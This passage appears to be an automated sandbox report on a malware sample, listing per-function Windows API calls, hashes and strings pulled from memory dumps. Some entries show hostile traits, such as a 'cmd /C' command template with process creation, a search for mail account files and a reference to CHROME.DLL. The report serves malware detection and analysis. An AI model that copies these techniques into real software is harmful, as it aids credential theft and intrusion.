  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B329FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3464F, Relevance: 6.0, APIs: 4, Instructions: 32 Total matches: 128memorystring
Similarity
  • Total matches: 128
  • API ID: lstrlen$RtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 1738276641-0
  • Opcode ID: aaba7d0a47ca100521561682d36ca88f08b4b9b0e2dd2eccb0d3987922e97ba9
  • Instruction ID: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
  • Opcode Fuzzy Hash: B7C012A4436C87C88CC059470679660D1C55FF6B0001C530BB0542A31D47523AB6758D
  • Instruction Fuzzy Hash: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
APIs
  • lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
  • lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
  • wsprintfW.USER32 ref: 01B3469A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2B66, Relevance: 5.2, APIs: 4, Instructions: 156 Total matches: 79memory
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 57932

General

Root Process Name:d3d8sext.exe
Process MD5:0520E2BE92296DE286739115ACA14892
Total matches:158
Initial Analysis Report:Open
Initial sample Analysis ID:57932
Initial sample SHA 256:D4883169ADA9F2D88BB36D2A05634A56C26DF3CBEEDF9D8A2DA073CDB049F46D
Initial sample name:unker4.exe

Similar Executed Functions

Function 001CDA13, Relevance: 10.6, APIs: 7, Instructions: 111 Total matches: 36string
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
